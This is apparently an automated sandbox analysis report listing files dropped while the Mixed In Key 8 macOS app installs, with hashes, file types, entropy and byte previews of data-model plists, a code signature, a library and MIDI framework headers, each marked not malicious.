SHA-512:	2819D4A42E4AFC1BC198FA6C7F9A1CF9030A02CF75C944667880F79E922707074AF4973F4F59DEC1208CD0519174977A2247867BB3930D6C4FF16B824C1892C4
Malicious:	false
Preview:	bplist00..............n.oX$versionX$objectsY$archiverT$top...............!.".#.$.%.&.>.?.C.J.x.y.z.{.\|.}.~....................................................................."...-.6.?.@.J.W.`.i.s.t.}.........................................................%.).1.5.9.?.C.H.K.N.R.S.W.k.l.m.n.o.x.y..................................................... .(.).2.6.<.@.E.H.I.M.U.V.b.f.g.jU$null.................ZNSEntities_..NSFetchRequestTemplates_..NSVersionIdentifiersV$class.................... WNS.keysZNS.objects...................................<.-.B.G..TSongZKeySegment]EnergySegmentZCollectionXWaveform..'.(.).*...+.,.-.../.0.1.2.3.4.5.6...8.9...;....\NSPropertiesZNSUserInfo_..NSManagedObjectModel_..NSClassNameForEntity_..NSVersionHashModifier_..NSFetchIndexDescriptions_..NSCompoundIndexes\NSEntityName]NSSubentities]NSSuperentity_..NSRenamingIdentifier...[.....h...].g........[MIKDataSong........@.A. ......D.E.F.GZ$classnameX$classes_..NSMutableDictionary..F.H.I\NSDictionaryXNSObject.......

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_E44pIC Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	data
Category:	dropped
Size (bytes):	21000
Entropy (8bit):	2.4638519202539104
Encrypted:	false
SSDEEP:	96:6zKxdOGDAicc/Ct/k3NJ6GUsitJoXuqPNHD1IyYi2bPv2r33K:6zKaGj5/W83NJe9tMuqpD1ir4K
MD5:	ADCF4B139EB2D9A35226FA1D56FE60EE
SHA1:	542D966BA93C1FDAD4F7F3D5B00569F889D4755E
SHA-256:	E2D9371B315C9DAE737DA34F323AADF083C02536F4ACE7C0BDA7A13E03EDD3F5
SHA-512:	A7FD2280F7DEA5955997413F12EEF567D92E493ECB90E328916B16CF0276BC511B60E001E1E7D5036A49510C0D8D0A360C2591DA8AFD1EE25505D5B72F24F970
Malicious:	false
Preview:	momv2$[]77y234078nf3490324nfauh7kf77y7pjfauy72-918reiaprehuhfrew..N$..>.......-8...@...6...............H...........A...............K..N.............................................C.o.l.l.e.c.t.i.o.n.........N.a.m.e.........C.u.e.P.o.i.n.t.........E.n.e.r.g.y.S.e.g.m.e.n.t...........K.e.y.S.e.g.m.e.n.t.........7.A.........S.o.n.g.........A.r.t.i.s.t.........0...........W.a.v.e.f.o.r.m........K........................................................PF_DEFAULT_CONFIGURATION_NAME...........................Collection..............................MIKDataCollection...............................songs...........................index...........................NSNumber................................isLibrary...............................name............................NSString................................filter.........................._opt............................_ent............................_pk.............................CuePoint................................MIKDataC

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_OKMcMp Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	8716
Entropy (8bit):	6.489296179743198
Encrypted:	false
SSDEEP:	192:00AcqgYsP9bueJ2CQseqPE57SX85p8aATXtsYHm:9hcNseq8UX85TATX6Gm
MD5:	6AD982F419EC9A33952985A786F9E25A
SHA1:	2ED246672CFFEC956A7CC8C40FB53192E62A3898
SHA-256:	8A6613D74DF636148C776EEA0EBB6C5E7A24D87193B138EECE5153E663D8CBB2
SHA-512:	B30B4AFDE1B73FA37F105B4D0E566C39466D9DCA9650828F951082D922D6C231150B21FED2B09E796482E1B9F0148D654F4266C3057D505C0F5D0A2DFD6532B0
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............!.".#.$.%.&.>.?.C.J.\|.}.~...............................................................................).3.4.=.G...R.[.d.m.n.w..................................................... .(.).-./.4.=.A.I.M.Q.W.[.`.c.f.j.k.o.........................................................#.$.%.&...8.@.A.J.N.T.X.].`.a.e.m.n.z.~....U$null.................ZNSEntities_..NSFetchRequestTemplates_..NSVersionIdentifiersV$class.................... WNS.keysZNS.objects...................................J.5.E.%..TSongZKeySegment]EnergySegmentZCollectionXWaveform..'.(.).*...+.,.-.../.0.1.2.3.4.5.6...8.9...;....\NSPropertiesZNSUserInfo_..NSManagedObjectModel_..NSClassNameForEntity_..NSVersionHashModifier_..NSFetchIndexDescriptions_..NSCompoundIndexes\NSEntityName]NSSubentities]NSSuperentity_..NSRenamingIdentifier..._.....l...a.k........[MIKDataSong........@.A. ......D.E.F.GZ$classnameX$classes_..NSMutableDictionary..F.H.I\NSDictionaryXNSObjec

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_OPbYq8 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	6672
Entropy (8bit):	6.387532171803014
Encrypted:	false
SSDEEP:	192:o47HfmRoY51JbOdUKT4bNs8H9vq0LaQSeVXs7:ooUCdUOoTdvqWBSeVc7
MD5:	0768D2C34F5517DB7E445752B62D47FC
SHA1:	EAEB064A4E08801BA4972FBE29578C57D39F6F35
SHA-256:	11940B70A801CDF71302139E83DDA6E01C8C9EF13E2A31CFD0F7F2789BD25F4D
SHA-512:	658ADABC7DD1FA4953CE2F1563E5EA27CEE429CDCF7D9C4B15A16F202C513F6C6C8BAACF4A6E4B26081C04E880FDE28DF755B00089A7173747E194CBD1324B31
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top.......}............. .8.9.=.D.X.Y.Z.[.\.].^._.`.s.t.u.z.............................................................A.B.C.D.E.F.G.H.I.J.K.L.U.^.g.p.y.........................................................".&.+.1.5.:.=.>.B.P.Q.R.S.[.g.o.p.y.}..............U$null.................ZNSEntities_..NSFetchRequestTemplates_..NSVersionIdentifiersV$class.....y.\|.............WNS.keysZNS.objects.......................#.F..WSegmentTSongZCollection..!.".#.$...%.&.'.(.).*.+.,.-.../.0...2.3...5....\NSPropertiesZNSUserInfo_..NSManagedObjectModel_..NSClassNameForEntity_..NSVersionHashModifier_..NSFetchIndexDescriptions_..NSCompoundIndexes\NSEntityName]NSSubentities]NSSuperentity_..NSRenamingIdentifier...'.....2...).1........_..MIKDataSongSegment........:.;........>.?.@.AZ$classnameX$classes_..NSMutableDictionary..@.B.C\NSDictionaryXNSObject........E.N....F.G.H.I.J.K.L.M..................O.P.Q.R.S.T.U.V............. ."..VlengthZsingleNoteZconfid

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_TpVHY3 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	2257
Entropy (8bit):	7.277383153742723
Encrypted:	false
SSDEEP:	48:7KTWzWC2jijHssqzjdzqfzjWHj/7L0jZnQ3jLBji7ojkuXB5y:7yoR9fW77Lu78R5y
MD5:	D04C43234BE03DD6504B394F7FEB2317
SHA1:	605864435C167EAAED1A5D40DEEF191A72F5B2A9
SHA-256:	4180847E8510DD6E44544D1AA4E3A4D5B85E35AFCB323BF2235C631444A439D5
SHA-512:	5DA649C5ED031DBD43912886C96B76458E74E8B4718B4EAD303842C74F61182DB075ADE8C8A151F6847525978B51ECB3246F2B41EEFDF1536BFEC8B7AD14D56E
Malicious:	false
Preview:	bplist00....T_."NSManagedObjectModel_VersionHashes_.'NSManagedObjectModel_CurrentVersionName............ 2:?HP[DataModel 6[DataModel 3[DataModel 8_..DataModel 3-mashup[DataModel 5[DataModel 2[DataModel 7[DataModel 4YDataModel...........TSongZKeySegment]EnergySegmentZCollectionXWaveformO. ........z..s.T3=.c..>.#..N..a.O. ....h..E..x.<...U.g..oa...n..9O. qC...a.6.../.,:..-.9.....F.`.O. F\|.C..?..(..p+.l.#9.ez5G.....7).O. ..sv.....UQ.3/..CS/...N+h...............ZKeySegment]EnergySegmentO. .........../.....A.....K.k..0.O. ....h..E..x.<...U.g..oa...n..9O. qC...a.6.../.,:..-.9.....F.`.O. F\|.C..?..(..p+.l.#9.ez5G.....7).O. ..sv.....UQ.3/..CS/...N+h......!".#.$%&'()]EnergySegmentXCuePointZKeySegmentO. .......vO...t.....I..~.o6...0O. qC...a.6.../.,:..-.9.....F.`.O. ..F......R..].I.$5.^Q........fO. F\|.C..?..(..p+.l.#9.ez5G.....7).O. ....h..E..x.<...U.g..oa...n..9O. ..sv.....UQ.3/..CS/...N+h......+,..-./01ZKeySegment]EnergySegmentO. y..lp...c..!...$Vk...:Qb.X.)..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_Y60j5R Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	11128
Entropy (8bit):	6.506953843893974
Encrypted:	false
SSDEEP:	192:kjFznqc5RiqoWFFkaJmoPU8Y2qYabECXPQxso8f7ecX1jtBQ3T19qHDRBdwqH:kpqqnFjAoUkqsCXPQq3p1JAU5vH
MD5:	BCFE6192B543A7706D1854EC580858AB
SHA1:	F8A9637F96BB208F7474713B3C2A5CA16FBAB317
SHA-256:	FC9A4CF551F5507A40B00E67F88C741A9DDA932B4CCEDD49C2CCC5EEFC5A684B
SHA-512:	D934A929AC2182FC32722AD164E79D7C8CD2C8073B675D6C549AE3E662C09E815DE6DC0EA6AE20F218A500812384E77785EDD44A8956AF8B29AC37904DBE7A08
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.%.&.'.(.).A.B.F.M...............................................................................................................!.&..-.1.2.3.<.F.G.P.Q.[.\.e.n.w.........................................#.+.4.=.F.Q.\.f.g.p.z.......................................#.'./.3.7.=.A.F.I.L.P.Q.U.c.d.e.n.w.x......................................................... .!."..2.:.C.L.T.U.].a.g.k.p.s.t.x............U$null.................ZNSEntities_..NSFetchRequestTemplates_..NSVersionIdentifiersV$class..................."WNS.keysZNS.objects................................... .!...o.w.c.t....TSong]EnergySegmentXCuePointZCollectionZKeySegmentXWaveform..*.+.,.-...../.0.1.2.3.4.5.6.7.8.9...;.<...>....\NSPropertiesZNSUserInfo_..NSManagedObjectModel_..NSClassNameForEntity_..NSVersionHashModifier_..NSFetchIndexDescriptions_..NSCompoundIndexes\NSEntityName]NSSubentities]NSSuperentity_..NSRenamingIdentifier........................[

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_ecl5oB Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	8831
Entropy (8bit):	6.497120752878308
Encrypted:	false
SSDEEP:	192:Jy4/AcY9i39bERKcjuFqs0jY5/27cR3X+pcZzCsjdTqKq:pUecjuFqzkO7cBX+CzNjdTE
MD5:	C8A7912B1C6B0AB76BD978F4C05823D5
SHA1:	E79B5F129AAD7B98C8CB0F9592818EE5EC4AF0F2
SHA-256:	0BE123A5CC313409D1261F9953A54BFE35824B57502690C6B92CF60988F30A8D
SHA-512:	734D19362CBB6A936766A78DB8516F4C78FA0CA626C34CDC2064485FED49726459EA960F9DF3CE7239A6F7C5A3898BCCF3DF71173F46720653601BC0B28300E5
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............!.".#.$.%.&.>.?.C.J.~.................................................................................$.%.-.7.B.L.V.W.`.j...u.~.................................................#.&..+.,.4.5.9.;.@.I.M.U.Y.].c.g.l.o.r.v.w.{.......................................................!./.0.1.2.:.D.L.M.V.Z.`.d.i.l.m.q.y.z........U$null.................ZNSEntities_..NSFetchRequestTemplates_..NSVersionIdentifiersV$class.................... WNS.keysZNS.objects...................................&.9.K.+..TSongZKeySegment]EnergySegmentZCollectionXWaveform..'.(.)....+.,.-.../.0.1.2.3.4.5.6...8.9...;....\NSPropertiesZNSUserInfo_..NSManagedObjectModel_..NSClassNameForEntity_..NSVersionHashModifier_..NSFetchIndexDescriptions_..NSCompoundIndexes\NSEntityName]NSSubentities]NSSuperentity_..NSRenamingIdentifier...a.....n...c.m........[MIKDataSong........@.A. ......D.E.F.GZ$classnameX$classes_..NSMutableDictionary..F.H.I\NSDictionaryXNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_hgnqY3 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	9051
Entropy (8bit):	6.473878113099952
Encrypted:	false
SSDEEP:	192:+VNQVKErUY+dbghoZqrqPenLOLbcpqWifjgQiZz:AGLVsUqmLOh5gQiZz
MD5:	72A2E29DB5F0F88C0AF642FF24447509
SHA1:	35DC52C2A2251732E1C5B7CD875CA84042FD5F89
SHA-256:	B8A3092AE73131A0204A3B2DEC3ABE484A98A6E48D79B6252D2BE714710DA1E2
SHA-512:	18F712F1AEDB53D7F493213D8F1ABE9248E43061C9F13CB5CCBFD059A7844EDC5C3B4A0431F43AEE15FF2BE93A4D643C1A199AAF286412823841DF61A05A03FC
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............!.".#.$.%.&.>.?.C.J........................................................................................+.3.=.H.R.\.].g.h.q.z...........................................#.'.(.+.2.7.;.>.B.C.D.L.M.Q.S.X.a.e.m.q.u.{.............................................................".+.4.5.9.G.H.I.J.R.\.d.e.n.r.x.\|....................U$null.................ZNSEntities_..NSFetchRequestTemplates_..NSVersionIdentifiersV$class.................... WNS.keysZNS.objects...................................(.;.O.-..TSongZKeySegment]EnergySegmentZCollectionXWaveform..'.(.)....+.,.-.../.0.1.2.3.4.5.6...8.9...;....\NSPropertiesZNSUserInfo_..NSManagedObjectModel_..NSClassNameForEntity_..NSVersionHashModifier_..NSFetchIndexDescriptions_..NSCompoundIndexes\NSEntityName]NSSubentities]NSSuperentity_..NSRenamingIdentifier...e.....r...g.q........[MIKDataSong........@.A. ......D.E.F.GZ$classnameX$classes_..NSMutableDictionary..F.H.I\NSDictio

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_plS1qb Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	9863
Entropy (8bit):	6.500379928893154
Encrypted:	false
SSDEEP:	192:DAO5k14IYSmbHSLeb/PQqK8RASJtJW+/op11TmavQRtaOwdsYEASQTynQq:Dd3SLkPQqAUi+/oprSU0Apen1
MD5:	B96AE6E32CA4187C66A2EAD1CF0B62DF
SHA1:	CD66402D20355EC5BB860B6B9975001B5F41E64C
SHA-256:	B65D5282293D51CB6F347326B3EA5DE9AA154D5C0B6AB324B9123B5CBDBE9C13
SHA-512:	42FBB650D53C4052418FA0FCCE4C51AB828376997E660FE8C1B94BFD271AA1362CC33A644D00F62B4CF2FA8CD1B4169C355E0173CC46C8CD66FC085F6D1A89DA
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.%.&.'.(.).A.B.F.M.......................................................................................$.%.&.0.;.E.O.P.\.d.n.y......................................... .!..4.A.E.M.Q.U.Y.Z.].d.i.m.p.t.u.v.................................................................(.).-.;.<.=.>.F.P.X.Y.a.e.k.o.t.w.x.\|................................................U$null.................ZNSEntities_..NSFetchRequestTemplates_..NSVersionIdentifiersV$class...................."WNS.keysZNS.objects................................... .!...C./.W.4.<..TSong]EnergySegmentXCuePointZCollectionZKeySegmentXWaveform...+.,.-...../.0.1.2.3.4.5.6.7.8.9...;.<...>....\NSPropertiesZNSUserInfo_..NSManagedObjectModel_..NSClassNameForEntity_..NSVersionHashModifier_..NSFetchIndexDescriptions_..NSCompoundIndexes\NSEntityName]NSSubentities]NSSuperentity_..NSRenamingIdentifier...l.....y...n.x........[MIKDataSong........C.D."......G.H.I.JZ$classname

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_ry08Gm Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	6793
Entropy (8bit):	6.373095926117128
Encrypted:	false
SSDEEP:	192:Rsyyb4IHfmRoY5lJbOdUKTrJU9RZqwF0IZXOAqwxe:RWbPUSdUOrJGZqg5Ze9
MD5:	0A97A00EA3B73E89730CAB60D6803AA0
SHA1:	3B23A98A07DD637C97277F961EDFA2C8A835E7B1
SHA-256:	5F0FFAD77E3362D029128FE60BCA5A9385EF1819D128DB097779222C9512BA28
SHA-512:	06A7E496898018F16BFAE6C7278F2503CCED5F8D63BB0288C848B033562BE68C93D9F382DB0D41B404B265586F5D203B85D964A6DBA66258082158DF222E5C04
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top..................... .8.9.=.D.X.Y.Z.[.\.].^._.`.s.t.u.z.............................................................C.D.E.F.G.H.I.J.K.L.M.N.O.X.a.j.s.\|.................................................".&.'.(.-.3.7.<.B.F.K.N.O.S.a.b.c.d.l.v.~....................U$null.................ZNSEntities_..NSFetchRequestTemplates_..NSVersionIdentifiersV$class.....{.~.............WNS.keysZNS.objects.......................#.G..WSegmentTSongZCollection..!.".#.$...%.&.'.(.).*.+.,.-.../.0...2.3...5....\NSPropertiesZNSUserInfo_..NSManagedObjectModel_..NSClassNameForEntity_..NSVersionHashModifier_..NSFetchIndexDescriptions_..NSCompoundIndexes\NSEntityName]NSSubentities]NSSuperentity_..NSRenamingIdentifier...'.....2...).1........_..MIKDataSongSegment........:.;........>.?.@.AZ$classnameX$classes_..NSMutableDictionary..@.B.C\NSDictionaryXNSObject........E.N....F.G.H.I.J.K.L.M..................O.P.Q.R.S.T.U.V............. ."..VlengthZsingleNoteZco

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/_CodeSignature/.BC.T_weiDsi Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	9604
Entropy (8bit):	5.307642349842789
Encrypted:	false
SSDEEP:	96:Cyo9BDTX+9sCslBgSZAWeOvsDvLL4wter7hHx4tOpHwzHpO5Dp7AVrCWhcv8/HPw:XDCooU/DoBZiOE/LJL5vEDzko
MD5:	013A1D736153C720DBD9416EEFC9B45F
SHA1:	AD4CD6B16EB7C7B168324C150C8841D119CDB283
SHA-256:	F062B8F3F820D2EB403C9C93D8F67CDE50AEC52E506DA23E4A707D8AE2113DC9
SHA-512:	216CABCF0E60692754BF47B5B6060A47941CF4AA99B1234B054B836AB39D81B1CC88762E75124A50BFC5C7BC688FA3FCAF7209ED573CD7A5EC50112D4F665D7E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/3to4.cdm</key>...<data>...0uVK3wsBWMprYhcSrSM+d3S3UxU=...</data>...<key>Resources/DataModel.momd/DataModel 2.mom</key>...<data>...OyOpigfdY3yXJ3+WHt+iyKg157E=...</data>...<key>Resources/DataModel.momd/DataModel 3-mashup.mom</key>...<data>...LtJGZyz/7JVqfMjED7UxkuYqOJg=...</data>...<key>Resources/DataModel.momd/DataModel 3.mom</key>...<data>...ZOTk2xVH1DPuQ1Yka06dTwVaIuk=...</data>...<key>Resources/DataModel.momd/DataModel 4.mom</key>...<data>...55tfEpqte5jIyw+VkoGO5exK8PI=...</data>...<key>Resources/DataModel.momd/DataModel 5.mom</key>...<data>...NdxSwqIlFzLhxbfNh1yoQEL9X4k=...</data>...<key>Resources/DataModel.momd/DataModel 6.mom</key>...<data>...CrH+uCoWy+mk53W1LQpO5pUm/Ro=...</data>...<key>Resources/DataModel.momd/DataModel 7.mom</key>...<data>...zWZALSA1XsW7hgtrmXUAG19B5

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/.BC.T_S1mY8H Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS>
Category:	dropped
Size (bytes):	689568
Entropy (8bit):	5.917331347258735
Encrypted:	false
SSDEEP:	6144:GGnrVrWjVmfQGnd6bmuVZjc2LgdUSYKvHBb+3FmE6PQ6TV0Tqy8qJsOqTAY:TrL6aufPLPKvHBb+3gE6PQs01
MD5:	0E43CF9FBD333878E318947B8E54D7B2
SHA1:	AC4BE20E5797E606834C315B74C63E6A7903CC0E
SHA-256:	9285FECC8E4F950DD2FE8391330BE347D081511A96664F870DB2C8A79BC2626A
SHA-512:	1B8A064A67FF241DFC00B3936EEF20828443AB07E7515A7A3F0C07D825120063E6DA470221631A8BBEF9829075B73B8A081CE3DE43F9EEB9110F2297A56A0C27
Malicious:	false
Preview:	........................................__TEXT..........................................................__text..........__TEXT..........................................................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..................D.......................................__objc_methname.__TEXT...................m......................................__cstring.......__TEXT...........j.......].......j..............................__objc_classname__TEXT..........................................................__objc_methtype.__TEXT..................5.......................................__const.........__TEXT..........................................................__gcc_except_tab__TEXT..........................................................__unwind_info...__TEXT..........................................................__eh_frame......__TEXT..................H...........................................8...__DATA..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_0DKQQ8 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	1676
Entropy (8bit):	4.91536557145414
Encrypted:	false
SSDEEP:	24:ZJLb0SZY9EMvtN7XOyPODH31x52w2EKESGM0NokzTvB1J1+3mLgVhB1JrOm:T0SZUN71cn52OtSGZBZXLg91
MD5:	FFB7BB345380695B28D7ED26366DE0CD
SHA1:	EC09F4E282095FB490362149C0A89AB5798FE877
SHA-256:	093CB9E53FF073F954C3E500944B25AAC73F712201AEEF85E03073D7E81DB278
SHA-512:	734362EF038AC2909FF1C9EA2B2CE290CD7ED5A40E520036E976D53039F71284D963CA34DD09763CEBD5CD02A2CD9F856D4AFF77AD824CF44DEA8CEA34EB7D6C
Malicious:	false
Preview:	//.// MIKMIDISystemKeepAliveCommand.h.// MIKMIDI.//.// Created by Andrew Madsen on 11/9/17..// Copyright . 2017 Mixed In Key. All rights reserved..//..#import "MIKMIDISystemMessageCommand.h"..NS_ASSUME_NONNULL_BEGIN../*. A MIDI System Keep Alive message (aka Active Sensing).. * Keep alive messages are sent repeatedly. * to tell the receiver of them that the MIDI connection is alive and working.. * Not all devices will send these at all.. . Per the MIDI spec, if a device does receive a keep alive message, it should. * expect to receive another no more than 300 ms later. If it does not, it can. * assume the connection has been terminated, and turn off all currently active. * voices/notes.. . Note that MIKMIDI doesn't (currently) implement this behavior at all, and it. * is up to MIKMIDI clients to implement it if so desired.. /.@interface MIKMIDISystemKeepAliveCommand : MIKMIDISystemMessageCommand.../. Convenience method for creating a keep alive command,

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_0E2xJl Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	17508
Entropy (8bit):	4.853870026899522
Encrypted:	false
SSDEEP:	192:TdaddlQ1rz49yJpyJMdbCQWQi7UywXnZZR/c3Mv8JXHbpi9GECXWWhjrvZeHZAD7:vrs94p6MxAW4EAh23ag6
MD5:	20DD501A931709733773DFFD6B31FA0D
SHA1:	6FFF8C8A20A9118C4956B94A2F489F5726DEC929
SHA-256:	8F79C4C0E5A545780CF06B761D8B2D9D5C4232176677BF3DBCEE6DFF56759590
SHA-512:	9F22DC276668192CC490971DDE0844D988B6D417F946C0761EF15CFB7B6ABF8496380B0880FF94129024B840DCED5146185DBD0C16AAB7FAB5B82BBBDCCEFB9B
Malicious:	false
Preview:	//.// MIKMIDISequence.h.// MIDI Files Testbed.//.// Created by Andrew Madsen on 5/21/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <AudioToolbox/AudioToolbox.h>.#import "MIKMIDICompilerCompatibility.h".#import "MIKMIDIMetaTimeSignatureEvent.h"..@class MIKMIDITrack;.@class MIKMIDISequencer;.@class MIKMIDIDestinationEndpoint;.@class MIKMIDIMetaTimeSignatureEvent;.@class MIKMIDITempoEvent;..NS_ASSUME_NONNULL_BEGIN../*. Instances of MIKMIDISequence contain a collection of MIDI tracks. MIKMIDISequences may be thought. * of as MIDI "songs". They can be loaded from and saved to MIDI files. They can also be played. * using an MIKMIDISequencer.. . @see MIKMIDITrack. * @see MIKMIDISequencer. /.@interface MIKMIDISequence : NSObject../. Creates and initializes a new instance of MIKMIDISequence.. . @return A new instance of MIKMIDISequence, or nil if an error occured.. /.+ (nullable instancetype)sequence;../.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_1em8ii Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	763
Entropy (8bit):	5.089398720125661
Encrypted:	false
SSDEEP:	12:ZhfUNXbwY8vnPvohlvoa13vhY1SAF7O6vheKT3Kshky0FQz8e6:ZhfMw73Ah1hvhLg7O6vh/w
MD5:	F2CEE092A8CC9AC62C2EBCEDC3C8B435
SHA1:	B2E8FDC79BABA626B2C19B1C3576C12065D36BB2
SHA-256:	0FC8507D0C42C2DCB2A257A13601AFF1E5E928889575998AD3D8247E2497217F
SHA-512:	1B0C40F81339B752BD9EE85AF37DF78268B78AC0E04FB393F54D1B7115BC0840369BC8AF90A8470ED95A6889AD1E85AAB25E67259A6867039CDCCABC40E89DAA
Malicious:	false
Preview:	//.// MIKMIDIMetaMarkerTextEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaTextEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. A meta event containing marker information.. /.@interface MIKMIDIMetaMarkerTextEvent : MIKMIDIMetaTextEvent..@end../. The mutable counterpart of MIKMIDIMetaMarkerTextEvent.. /.@interface MIKMutableMIDIMetaMarkerTextEvent : MIKMIDIMetaMarkerTextEvent..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, readwrite) MIKMIDIMetaEventType metadataType;.@property (nonatomic, strong, readwrite, null_resettable) NSData metaData;..@end..NS_ASSUME_NONNULL_END

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_3oyF1d Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
